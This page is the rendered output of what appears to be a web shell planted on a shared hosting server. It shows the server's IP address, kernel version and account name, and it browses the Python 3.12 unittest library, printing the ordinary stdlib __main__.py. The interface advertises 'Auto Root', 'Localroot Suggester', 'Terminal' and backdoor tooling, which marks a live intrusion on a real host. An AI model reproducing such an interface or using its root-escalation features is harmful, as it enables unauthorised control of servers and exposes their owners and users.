Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python312 /
lib64 /
python3.12 /
unittest /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-02-10 03:50
__init__.py
3.41
KB
-rw-r--r--
2026-01-08 12:42
__main__.py
472
B
-rw-r--r--
2026-01-08 12:42
_log.py
2.68
KB
-rw-r--r--
2026-01-08 12:42
async_case.py
5.35
KB
-rw-r--r--
2026-01-08 12:42
case.py
56.18
KB
-rw-r--r--
2026-01-08 12:42
loader.py
20.62
KB
-rw-r--r--
2026-01-08 12:42
main.py
11.71
KB
-rw-r--r--
2026-01-08 12:42
mock.py
103.83
KB
-rw-r--r--
2026-01-08 12:42
result.py
8.92
KB
-rw-r--r--
2026-01-08 12:42
runner.py
10.13
KB
-rw-r--r--
2026-01-08 12:42
signals.py
2.35
KB
-rw-r--r--
2026-01-08 12:42
suite.py
13.2
KB
-rw-r--r--
2026-01-08 12:42
util.py
5.09
KB
-rw-r--r--
2026-01-08 12:42
Save
Rename
"""Main entry point""" import sys if sys.argv[0].endswith("__main__.py"): import os.path # We change sys.argv[0] to make help message more useful # use executable without path, unquoted # (it's just a hint anyway) # (if you have spaces in your executable you get what you deserve!) executable = os.path.basename(sys.executable) sys.argv[0] = executable + " -m unittest" del os __unittest = True from .main import main main(module=None)